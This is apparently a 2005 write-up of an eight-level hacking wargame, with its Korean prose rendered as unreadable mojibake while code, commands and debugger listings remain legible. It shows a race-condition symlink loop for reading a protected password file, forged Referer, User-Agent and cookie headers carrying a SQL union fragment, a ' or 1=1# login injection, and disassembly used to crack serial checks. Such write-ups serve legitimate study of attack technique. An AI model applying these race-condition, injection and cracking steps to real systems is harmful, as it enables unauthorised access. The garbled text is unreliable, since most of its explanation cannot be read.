[Document Infomation] 
 :: Title  ::  3ȸ õб ȣ 佺Ƽ 
 :: Date   :: 2005. 11. 28
 :: Author :: singi
 :: Contact:: E-Mail : sjh21a@hotmail.com
              Homepage : http://work.hackerschool.org/~sjh21a



[Index] 
 
0x00. ȸ .
0x01. Level1 ( ⺻   )
0x02. Level2 (Ưڷ ̷ 丮 /Race Condition ⺻ )
0x03. Level3 (4  Ǯ,   α׷ Է)
0x04. Level4 (simple reversing)
0x05. Level5 (guessing & simple cookie sniffing & spoofing)
0x06. Level6 (IP header checksum calculation)
0x07. Level7 (simple sql query injection)
0x08. Level8 (hard cracking (simple?))
0x09. ġ鼭.






[0x00. ȸ]

  ȸ    ٲ г ȫ(?)   ߴµ

 ƴϰ Ի ϰ Ǿ׿....OTL



[0x01. Level1]

Level1 ȿ    ϴ.

 20µ,   18 ľ߸   ߽ϴ.

ڽ ߴ 鵵 ۸  ̿ ˻ϴ Ʋ  ҽϴ.

 ˰ ִ 鵵 ڽŰ   ׷  ϴ.

 ￡  

Ʈũ  ̿µ  κ   ־ϴ.

ڼ    , 

 ٸ    ؼ   ̴.

snmp   ƴ  .

sis ʱ ƴ .

޽ ϴ  ˸  뷫  ϴ.

 縦 س ʾƼ   ʴ±.

    Level2     ְ Ǿϴ.

pass : no surprise



[0x02. Level2]

Level2 Ưڷ  濡  ϴ  password  

 о ϴ.

α غ, Hint 

Ǹ  𾾴 ڽ   йȣ  ؾ ڽŸ
  桯   ξ. ׷ Ǹ  ڱⰡ 
 濡  ϴ ̴.  йȣ ãּ~!

̾ϴ.

ϴ vi  ls  丮   ⺻ 丮 ܿ ^B, ^V, ?  丮  ߽ϴ.

vi  Ưڷ ̷  غ  ^B  丮   ̶ 丮 ְ

׾ȿ passwd   ְ ̰ о     ߽ϴ.

 passwd  ⺻ ۹̼ 

-r--r----- root     root   passwd ???? 

Ϲ     ϴ. ϴ    ϰ vi  ̿ؼ ƴ

 Ư 丮  ߽ϴ.

cd ɿ perl   ָ Ǵµ.

cd `perl -e 'print "\x??"'` ̷ ??  ´ 16 ڸ Էϸ ˴ϴ.

^B  ^V Ƿ, 16 ǥ

^B = 02, ^V = 16 Դϴ.

chamber of secret 丮 ̸ ڿ ̽ , ϰ tab ν Ŀ߽ϴ.

 passwd  ۹̼  ʾҰ(  ־) tmp  .sys  丮 ϴ.

Խǿ  ؼ, "Ư Ȳ     ִ"  Ʈ  

race condition   ߽ϴ. ٷ  ҽ   ׽ϴ. ҽ

1
#include <stdio.h>
int main()
{
while(1) {
system("cat ../../password");
}
}
 

2
#include <stdio.h>

int main()
{
while(1) {
symlink("../../password","pass");
unlink("./pass");
}
}
(Ȥ  2  Ƚϴ)

 Ŀ ͹̳ â Ʒ  ޽  Ǿϴ.


good job :)

password is "info security"

н ޼  

$ ./1 2>/dev/null <-- ɾ

ϰ н常  ˴ϴ.

pass : info security




[0x03. Level3]

3 ϸ level3̶ α׷ ణ Hint ־ϴ.

Hint 

x*x*x*x - 34*x*x*x - 340*x*x + 1858*x + 12915

        a < b < c < d

̷ ̾ϴ. 

        "a < b < c < d"   ؾ н尡  ٴ  ˾ҽϴ.

level3 ̶ α׷ α׷  ߿ Ư ñ׳ ctrl+c, ctrl+z, ctrl+\ 

Էϸ ctrl+c = a--, ctrl+z = c++, ctrl+\ = b-- ׸ d  0~60   ˴ϴ.

d 60 Ǹ α׷ ᰡ .

*Ư ñ׳ c,z   ˾Ƴ, \  α׷  ߽ϴ.*

* 2,3,4  ǥ þұ  ʿ ҽ ÷ϵ ϰڽϴ.*

Խ    4   ϶ ϴ.

(ڼؼ  ã -_-;)

   2 ĵ 𸨴ϴ. ׷  ее ϽŴٴ mathematica  α׷

   ߽ϴ.   {{x -> -9}, {x -> -5}, {x -> 7}, {x -> 41}}

, a < b < c < d  ؼ a=-9, b=-5, c=7, d=41  ˴ϴ.

a  ctrl+c  9  -9 ְ, b  c    ݴϴ. 

21 ȿ Է ؾ մϴ.  ׸   d  41 Ǹ   н尡  ˴ϴ.

pass : rage against the cracker




[0x04. Level4]

level4   Ư   ޾ҽϴ.

α׷ ٿ ް,    ip  Է ϶  ϴ.

ƹ Է ص ƹ  , ollydbg  α׷  Ǿϴ.

ϴ search for -> all referenced text strings  ؼ

α׷ ϰ ִ ڿ ҽϴ.

0592842722, 2027148262, 2320512323, 2221114222 

HTTPTEST, .index.bak, GET, index.html, GET

   ҽϴ. α׷     ʿ ߴ

"Get Index!!"  ̸     level4 α׷ Ư ip   ؼ

.index.bak  index.html ޾ƿ α׷ ߽ϴ.

׷  ASCII "0592842722"  break point  ɾ α׷  ׽ϴ. (f9)

00401D9E  |. E8 6CF2FFFF    CALL level4.0040100F

κп α׷  Ǿϴ. âٰ ƹ ڳ, ڸ Է ҽϴ.

׷  break point(bp)    ߰ Ǵµ,

004012D0  |. 68 8C004200    PUSH level4.0042008C                     ;  ASCII "0592842722"
004012D5  |. 8D95 D403FEFF  LEA EDX,DWORD PTR SS:[EBP+FFFE03D4]
004012DB  |. 52             PUSH EDX
004012DC  |. E8 8F070000    CALL level4.00401A70
004012E1  |. 83C4 08        ADD ESP,8
004012E4  |. 68 7C004200    PUSH level4.0042007C                     ;  ASCII "2027148262"
004012E9  |. 8D85 DE03FEFF  LEA EAX,DWORD PTR SS:[EBP+FFFE03DE]
004012EF  |. 50             PUSH EAX
004012F0  |. E8 7B070000    CALL level4.00401A70
004012F5  |. 83C4 08        ADD ESP,8
004012F8  |. 68 6C004200    PUSH level4.0042006C                     ;  ASCII "2320512323"
004012FD  |. 8D8D E803FEFF  LEA ECX,DWORD PTR SS:[EBP+FFFE03E8]
00401303  |. 51             PUSH ECX
00401304  |. E8 67070000    CALL level4.00401A70
00401309  |. 83C4 08        ADD ESP,8
0040130C  |. 68 5C004200    PUSH level4.0042005C                     ;  ASCII "2221114222"

 ڿ ־ϴ. ϴ Ʒʿ   Ǵ  ־   ׽ϴ.

00401340  |> 8B8D D003FEFF  /MOV ECX,DWORD PTR SS:[EBP+FFFE03D0]
00401346  |. 83C1 01        |ADD ECX,1
00401349  |. 898D D003FEFF  |MOV DWORD PTR SS:[EBP+FFFE03D0],ECX
0040134F  |> 83BD D003FEFF > CMP DWORD PTR SS:[EBP+FFFE03D0],4
00401356  |. 7D 60          |JGE SHORT level4.004013B8
00401358  |. 6A 03          |PUSH 3
0040135A  |. 8B95 D003FEFF  |MOV EDX,DWORD PTR SS:[EBP+FFFE03D0]
00401360  |. 6BD2 0A        |IMUL EDX,EDX,0A
00401363  |. 8D8415 D403FEF>|LEA EAX,DWORD PTR SS:[EBP+EDX+FFFE03D4]
0040136A  |. 0385 D003FEFF  |ADD EAX,DWORD PTR SS:[EBP+FFFE03D0]
00401370  |. 50             |PUSH EAX
00401371  |. 8D8D FC03FEFF  |LEA ECX,DWORD PTR SS:[EBP+FFFE03FC]
00401377  |. 51             |PUSH ECX
00401378  |. E8 E3070000    |CALL level4.00401B60
0040137D  |. 83C4 0C        |ADD ESP,0C
00401380  |. C685 0004FEFF >|MOV BYTE PTR SS:[EBP+FFFE0400],0
00401387  |. 83BD D003FEFF >|CMP DWORD PTR SS:[EBP+FFFE03D0],3
0040138E  |. 74 09          |JE SHORT level4.00401399
00401390  |. C685 FF03FEFF >|MOV BYTE PTR SS:[EBP+FFFE03FF],2E
00401397  |. EB 07          |JMP SHORT level4.004013A0
00401399  |> C685 FF03FEFF >|MOV BYTE PTR SS:[EBP+FFFE03FF],0
004013A0  |> 8D95 FC03FEFF  |LEA EDX,DWORD PTR SS:[EBP+FFFE03FC]
004013A6  |. 52             |PUSH EDX
004013A7  |. 8D85 0404FEFF  |LEA EAX,DWORD PTR SS:[EBP+FFFE0404]
004013AD  |. 50             |PUSH EAX
004013AE  |. E8 CD060000    |CALL level4.00401A80
004013B3  |. 83C4 08        |ADD ESP,8
004013B6  |.^EB 88          \JMP SHORT level4.00401340

̰    ε, f8  Ű鼭   059.027.205.111 ̶ Ǹ  ݴϴ.

, ƹ ڿ̳ Է ص  ڿ Է .

׸ ASCII "~~" 鵵   ִµ, ̰ ؼ Ʒ loop  뷫 ˰    ֽϴ.

ASCII ڵ 0592842722   2027148262   2320512323   2221114222

  ø  ѹ    +1  Ǽ Ǹ  ݴϴ. 

0592842722 ---> 059

2027148262 ---> 027 ( տ 1 jump +1)

2320512323 ---> 205 ( տ 2 jump +2)

2221114222 ---> 111( տ 3 jump +3)

059.027.205.111 (level2   IP)   ϴ.  Ƿ index.bak  index.html  ִ α׷Դϴ.

 鼭 ٸ  . 

004013DB  |. 8BF4           MOV ESI,ESP
004013DD  |. 6A 00          PUSH 0
004013DF  |. 6A 00          PUSH 0
004013E1  |. 6A 00          PUSH 0
004013E3  |. 6A 00          PUSH 0
004013E5  |. 68 50004200    PUSH level4.00420050                     ;  ASCII "HTTPTEST"
004013EA  |. FF15 A0634200  CALL DWORD PTR DS:[<&WININET.InternetOpe>;  WININET.InternetOpenA


Ʊ Ҵ HTTPTEST  InterOpenA  Լ Ǿ. ̰ API Լ Դϴ.

 ڵ Ҵ  Է Ǿ.

׸  Ʒ

00401407  |. 6A 00          PUSH 0
00401409  |. 6A 00          PUSH 0
0040140B  |. 6A 03          PUSH 3
0040140D  |. 68 9C004200    PUSH level4.0042009C
00401412  |. 68 9C004200    PUSH level4.0042009C
00401417  |. 6A 00          PUSH 0
00401419  |. 68 EC364200    PUSH level4.004236EC
0040141E  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
00401421  |. 50             PUSH EAX
00401422  |. FF15 9C634200  CALL DWORD PTR DS:[<&WININET.InternetCon>;  WININET.InternetConnectA


InterConnectA  Լ ־ϴ. ̰ ڵ   ߽ϴ.

InternetConnect(hInternet,"server",0,"","",INTERNET_SERVICE_HTTP,0,0);

ڵ ϳϳ  ҽϴ.

00401407  |. 6A 00          PUSH 0 --> 0
00401409  |. 6A 00          PUSH 0 --> 0

0040140B  |. 6A 03          PUSH 3 --> INTERNET_SERVICE_HTTP

0040140D  |. 68 9C004200    PUSH level4.0042009C --> ""
00401412  |. 68 9C004200    PUSH level4.0042009C --> ""

00401417  |. 6A 00          PUSH 0 --> 0

00401419  |. 68 EC364200    PUSH level4.004236EC ??? (ζ 059.027.205.111  ־   Դϴ.)

0040141E  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
00401421  |. 50             PUSH EAX  <--- hInternet 

004236ec     Ų , server ּҰ ־     ҽϴ.

004236E8  00 00 40 00 00 00 00 00  ..@.....
004236F0  00 00 00 00 00 00 00 00  ........
004236F8  00 00 00 00 00 00 00 00  ........

..ƹ͵ ϴ. *( α׷ ȭ ƹ͵ Ƚ׽ϴ)

׷ Ƿ  ּҿ ip ּҸ ־ , 

00401516  |. C68415 0802FFF>|MOV BYTE PTR SS:[EBP+EDX+FFFF0208],0

 κ 뿡 ߾ϴ. Ƹ ip  ߸   ҽϴ.

 α׷    ȸ   ̷ ܵξϴ.

ٸ Ƿ  е α׷ ļ  ˾Ƴ̰,   http://59.27.205.111/index.html 

http://59.27.205.111/.index.bak  û ҽϴ.    ۵ ȵǴ. ( ̻ ִ  ˾ҽϴ OTL)

59.27.205.111   Ȯϴ apache  ϴ. (߿ Ȯ ϴ   Ǵ.)

׷ level2  /var/www/html   ؼ .index.bak   ҽϴ. ( ϴ;; ׶ ȵƾ~)

 base64 ѹ encoding  ¿  php Լ  ˾Ƴϴ.

<?
$str="ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk=";
echo base64_decode($str);
?>

$ php base64.php
!!!Level4 !!!
Password : know your enemy $


pass : know your enemy

level4 ps : ٸ е  α׷ ޾ƿ ̴ ñ մϴ Ф ƴϸ  ΰǰ?



[0x05. Level5]

*̹     ߴ Դϴ.
*id ˾Ƴ  ϰ, password ˾Ƴ  ϰ.. ̹ ȸ ߿   밡 ߽ϴ.

level5   ϸ ȭ鿡 id  pw   , guest page | level5 page ֽϴ.

ϴ form     sql injection  õ  ʾҽϴ  (¥      ߽ϴ;;)

  ħ Ʈ Դµ, guessing.. ϶ ſϴ.  ϱ ...id list   

wwwhack  crack غҽϴ.

id-list

guest
admin
member
auth
level05
user
nobody
test
tester
master
level5
hacker
account
login
administrator
anonymous

׷ ũ  ؼ     ִ ,   Ʈ ϳ Խϴ.

id guest ̰ pw  a*** ̾ϴ. (йȣ id  ° ô ߽ϴ...)

׸  Ŀ ߰ ۾ ʿϴٰ ־ϴ.

˾Ƴ id  pw  guest / asdf Դϴ. α  , guest page  ϴ н尡 asdf   ְ,

level5     user-agent  reffer  Security First, 192.168.?.??/level5.html  ٲ level5   Ǵ ſϴ.

* SecurityFirst    ϼż,  ϴ  ˰ ˻ ߾ϴ. mook ΰ monk   α׿ ణ  *

cookie sniffing  spoofing    achilles    õ ߽ϴ.

ϴ guest  login  Ŀ, guest page  ,   level5 page   ߽ϴ.

 cookie 

POST /level5/guqehdrhks/level5.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Referer: 192.168.111.222/level5.html
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: SecurityFirst Explorer
Host: 59.27.205.110
Cookie: r_num=%5C%27+union+select+%2A+from%23; user=level5


Դϴ.

level5 page      н带 ˷־ϴ.

pass : plastic tree



[0x06. Level6]

level6 ip header  checksum   ϴ Դϴ.
ó    raw socket  鼭 sniffing  ϴ ̾µ

   ڿ source ip  destination ip  ٲ checksum  ٲ 

ȵ˴ϴ. ׷     Ǫ ε ۸ ˻ϸ ϴ  ɴϴ.



45  00  00  40  F5  DA  40  00  80  06  
??  ??  C0  A8  00  02  42  A1  27  C3  


    ϴ ˾ƾ մϴ. (Ŷ   Ŷ ϳ Ƽ ip header κ ø ˴ϴ.)

45 00  ip version  ihl (data offset) Ÿϴ.

00 40  total length. 0x40 -> 64

f5 da  identification(id) 0xf5da -> 62938

80  time to live(ttl)  Ÿϴ -> 0x80 -> 128

06  ip protocol  Ÿϴ. 06 -> IPPROTO_TCP

C0  A8  00  02 ̰ source ip : 192.168.0.2

42  A1  27  C3 ̰ destination ip : 66.161.39.195

 Ÿϴ.

 ù° header   ڽϴ.
0. checksum 0 ʱȭ Ѵ. (ĭ̴ pass)

1. IP   ؼ, 16Ʈ(2Ʈ) ǵ ش.

45 00 + 00 40 + F5 DA + 40 00 + 80 06 + C0 A8 + 00 02 + 42 A1 + 27 C3 = 3262E

 16Ʈ ǵ ô. 3262E(20Ʈ)

262E , 0003 = 3262E

  262E + 0003 = 2631

̷ν ip   ؼ 16Ʈ ǵ ߾ ־ϴ.

  1    մϴ.

0010 0110 0011 0001 <-- 2631

1101  1001 1100 1110 <--  
13(D)   9    12(C)  14(E)

* ù°     쿣  ڸ 0̾ 4ڸ  ȵ˴ϴ. ڿ    0 ߰ ָ ˴ϴ.*

ù° ĭ  D9 CE Դϴ.

ι° header      ϸ ˴ϴ.


45  00  00  3E  24  BD  00  00  80  11  
??  ??  3B  1B  CD  78  A8  7E  3F  01  

 Ȱ м غڸ

45 00  ip version  ihl (data offset) Ÿϴ.

00 3e  total length. 0x3E -> 62

24 bd  identification(id) 0x24bd ->9405

80  time to live(ttl)  Ÿϴ -> 0x80 -> 128

11  ip protocol  Ÿϴ. 11 -> ̾  ȳϴ  Ƹ UDP ̾ ...OTL..

3B 1B CD 78 ̰ source ip : 59.27.205.120

A8 7E 3F 01 ̰ destination ip : 168.126.63.1


 checksum ϴ   غ


45  00  + 00  3E  + 24  BD  + 00  00  + 80  11 + 3B  1B + CD  78 + A8  7E + 3F  01   = 2DA1E

 20Ʈ Ѿ

DA1E + 0002 = DA20 

̰  1   ϸ

1101 1010 0010 0000 <-- DA20

0010 0101 1101 1111 <---  

 2     5       13(D) 15(F)

 ι° ĭ  25 DF  ˴ϴ.

     н尡 ־ϴ.

pass : packet storm



[0x07. level7]

level7 ʹ ϰ(?) Ǯ ڼ  м  ߽ϴ.

̸ = name
 = nick
Ϲȣ = reg_num

̹  name ̳ nick Ǵ reg_num  sql query  
 b.php  ϰ ͸ ѷִ php  c.php Դϴ.

 c.php տ form  Է ͵ ҷɴϴ.

̶ ̴  ϸ

select id,nick,reg_num from quiz_table where reg_num='$reg_num'

name  nick â  غ,  ٸ  ޽  ʾұ 

ٸ name  nick  ڿ̳   ٸ ڰ 

"±׸ Ҽ ϴ."  ڿ , ߽ϴ.

׸   Ϲȣ(reg_num) Ƚϴ.

ϰ Ϲȣ  form  ' or 1=1#  ̿ؼ Ǯϳ.

̸  : singi
  : asdf
Ϲȣ : ' or 1=1#

  Է       Ȯ ϴ

̹ Է Ǿ ־    Ǹ鼭 level8 н嵵  Ǿϴ.

your information :

  : password is :
  : comeasyouare
Ϲȣ : 2002338720034713




[0x08. Level8]

level8    ϴ level4 ó Ư   ޾Ƽ

crack ϴ  ҽϴ. 

 ߿   SecurityFirst  key  ˾Ƴ ̰, 

  Ǫ  ƾ, ڵ  ϸ ȵǾϴ.

  Ȳ, ׷ ϴ Լ ƾ   ollydbg   ׽ϴ.

ϸ鼭 ˾Ƴ ,   1 Ʈ 2 fake  ֽϴ.

۵ϴ Ʈ ̸ Ư ڿ ƴϸ ø ¾Ƶ  ޽ ϴ.

level4   ϴ search for -> all referenced text strings  ؼ

α׷  ڿ ҽϴ.

ڿ 캸, Sorry, you are wrong  ڿ 3 ־ϴ.

 бⰡ ִٴ ̰.

ø ¾   ־ϴ. ϴ  

 ó "Sorry you are wrong"  bp  ɾϴ. ׸  Ų 

level8.exe  ǰ, ƹڿ Է ϰ Ȯ , bp  ɾ  ߾ϴ.

  ϸ

00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
0040174E  |. E8 C1060000    CALL <JMP.&MFC42.#1200>
00401753  |> 6A 00          PUSH 0                                   ; /status = 0
00401755  |. FF15 CC314000  CALL DWORD PTR DS:[<&MSVCRT.exit>]       ; \exit


α׷  Ǳ ,  Լ ҷ   캸 ߽ϴ.

0040170C  /$ 55             PUSH EBP ̰  Ʒ  â

Local call from 004016e6   Ǵµ    Լ ҷٴ    ֽϴ.

Go to call from 004016e6  Ŭ ؼ  ö ҽϴ.

 ּ ó ɹ   б  ˾ ½ϴ.

004016E5  |. 51             PUSH ECX                                 ; /Arg1
004016E6  |. E8 21000000    CALL level8.0040170C                     ; \level8.0040170C
004016EB  |. 83C4 04        ADD ESP,4
004016EE  |> E8 C9010000    CALL level8.004018BC
004016F3  |. E8 71010000    CALL level8.00401869
004016F8  |. 8B95 6CFFFFFF  MOV EDX,DWORD PTR SS:[EBP-94]
004016FE  |. 52             PUSH EDX                                 ; /Arg1
004016FF  |. E8 A5000000    CALL level8.004017A9                     ; \level8.004017A9

0040170c   ޽, 004017a9  б Ǹ  ޽ ϴ.

ٷ  κ   Լε

004016D5  |> C785 6CFFFFFF >MOV DWORD PTR SS:[EBP-94],2
004016DF  |. 8B8D 6CFFFFFF  MOV ECX,DWORD PTR SS:[EBP-94]
004016E5  |. 51             PUSH ECX                                 ; /Arg1
004016E6  |. E8 21000000    CALL level8.0040170C                     ; \level8.0040170C


  ߿ 004016d5  jump ϴ  ãƼ 캸ҽϴ.

004016BE  |. 75 15          JNZ SHORT level8.004016D5

004016C7  |. 74 0C          JE SHORT level8.004016D5

ãƳ 鿡  bp    ٽ  ׽ϴ.

 ó 004016be   ߾ϴ.     004016bb  bp  ɾ

eax     ϴ ˾ƺҽϴ.

004016BB  |. 3B42 60        CMP EAX,DWORD PTR DS:[EDX+60] 

.. ollydbg ٰ  ̾ϴ.

Stack DS:[0012FEE4]=000004d2 <-- Է ø(1234)
EAX=10412f6a   <-- test  ùٸ serial 272707434

 ̶   Ʈ ִ     ߽ϴ.

*   , eax   ִ  ø Ȯϰ ׳ Էұ  ,

Ǯ̹    ߽ϴ.*

Ǿ Լ  ؼ Search for -> all intermodular calls 

α׷  Լ ҽϴ.

  ˾    Լ Ǿ  ã  ־ϴ.

004019ba κп strcmp Լ  Ǿµ   strcmp    

α׷ оϴ.

004019AE  |> 68 E8404000    /PUSH level8.004040E8                    ; /s2 = "sch_sf.exe"
004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |
004019B9  |. 51             |PUSH ECX                                ; |s1
004019BA  |. E8 CD040000    |CALL <JMP.&MSVCRT.strcmp>               ; \strcmp

Ʊ Ҵ sch_sf.exe   strcmp  ڷ Ǿϴ. ׷  ̰ bp   

004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |

    ڿ sch_sf.exe  ٲ ָ   Դϴ. (   ϴ ̶)

  , strcmp   ʾҽϴ. ٸ   غҽϴ.

׷  Ʊ   õ   ޽  ־   

ãƺҽϴ.  fake ϴ. 

00401869 <-- fake 1  κ

004018bc <-- fake 2  κ

 2 Լ fake  ,  ⿣   ޽ Ѵٰ  

  캸 ٸ κ ֽϴ.

< ƾ>
00401739  |. 8945 08        MOV DWORD PTR SS:[EBP+8],EAX
0040173C  |. 817D 08 238167>CMP DWORD PTR SS:[EBP+8],5678123
00401743  |. 75 0E          JNZ SHORT level8.00401753
00401745  |. 6A 00          PUSH 0
00401747  |. 6A 00          PUSH 0
00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
0040174E  |. E8 C1060000    CALL <JMP.&MFC42.#1200>



< ƾ1>
0040189E  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
004018A1  |. 817D FC 238167>CMP DWORD PTR SS:[EBP-4],5678123
004018A8  |. 74 0E          JE SHORT level8.004018B8
004018AA  |. 6A 00          PUSH 0
004018AC  |. 6A 00          PUSH 0
004018AE  |. 68 78404000    PUSH level8.00404078                     ;  ASCII " Sorry You are wrong "
004018B3  |. E8 5C050000    CALL <JMP.&MFC42.#1200>


< ƾ2>
004018F1  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
004018F4  |. 817D FC 238167>CMP DWORD PTR SS:[EBP-4],5678123
004018FB  |. 74 0E          JE SHORT level8.0040190B
004018FD  |. 6A 00          PUSH 0
004018FF  |. 6A 00          PUSH 0
00401901  |. 68 90404000    PUSH level8.00404090                     ;  ASCII " Sorry You are wrong "
00401906  |. E8 09050000    CALL <JMP.&MFC42.#1200>


 ƾ JNE ,  ƾ  JE  ó ϴ.  "Sorry You are wrong"

 µ ʰ Ѿ . 

  strcmp   ǹ Ǯ  ƴ.

 ó ƿͼ 

00401F6E  |> 46             /INC ESI
00401F6F  |. 8975 8C        |MOV DWORD PTR SS:[EBP-74],ESI
00401F72  |. 8A06           |MOV AL,BYTE PTR DS:[ESI]
00401F74  |. 3AC3           |CMP AL,BL
00401F76  |. 74 04          |JE SHORT sch_sf.00401F7C
00401F78  |. 3C 22          |CMP AL,22
00401F7A  |.^75 F2          \JNZ SHORT sch_sf.00401F6E


 κп  ̸ üũ ϴ°Ͱ  ó ְ ־ϴ.

 ̻ ˾Ƴ ϰ, 004016BB  ٽ bp  ɰ

 Ʒ  Ǿ ִ ˾ ҽϴ.

004016C0  |. E8 6A020000    CALL level8.0040192F

strcmp   ִ Լ (?)  ۵Ǵ ּ ϴ.

 Լ Ǿ, ɻ strcmp ̱  strcmp ҽϴ.

004019AE  |> 68 E8404000    /PUSH level8.004040E8                    ; /s2 = "sch_sf.exe"
004019B3  |. 8D8D F8FEFFFF  |LEA ECX,DWORD PTR SS:[EBP-108]          ; |
004019B9  |. 51             |PUSH ECX                                ; |s1
004019BA  |. E8 CD040000    |CALL <JMP.&MSVCRT.strcmp>               ; \strcmp
004019BF  |. 83C4 08        |ADD ESP,8
004019C2  |. 85C0           |TEST EAX,EAX
004019C4  |. 75 07          |JNZ SHORT level8.004019CD
004019C6  |. C745 FC 010000>|MOV DWORD PTR SS:[EBP-4],1
004019CD  |> 8D95 D4FEFFFF  |LEA EDX,DWORD PTR SS:[EBP-12C]
004019D3  |. 52             |PUSH EDX                                ; /pProcessentry
004019D4  |. 8B85 D0FEFFFF  |MOV EAX,DWORD PTR SS:[EBP-130]          ; |
004019DA  |. 50             |PUSH EAX                                ; |hSnapshot = 000000B0 (window)
004019DB  |. E8 44060000    |CALL <JMP.&KERNEL32.Process32Next>      ; \Process32Next
004019E0  |. 85C0           |TEST EAX,EAX
004019E2  |.^75 CA          \JNZ SHORT level8.004019AE


Process32Next  Ǿ.

̸ "sch_sf.exe"  ٲ ϴ° ´µ

 ڸ, μ Ʈ ̸ sch_sf.exe  ־   մϴ.

, level8.exe  ̸ sch_sf.exe  ƴϾ, ٸ  ̸ sch_sf.exe ٲٰ

  , level8.exe   Ѽ,  ص  ޽  ˴ϴ.

 ñ Ǯȱ⿡ 8  ߽ϴ.

pass : 451238960





[0x09. ġ鼭]

, ؿ  ִ     Ǿ!!

  ^-^    ,   ٽ    ϴ.

  Ϸ ,   ʾҽϴ.

..ø Ѱ   ϳ׿. ׸Ϸ ϸ  ٵ,     ;(

 Ѱ   ּ

ٽ ѹ   ֽ õб е 帳ϴ.

  ߾ ǰڳ׿! bye bye~~



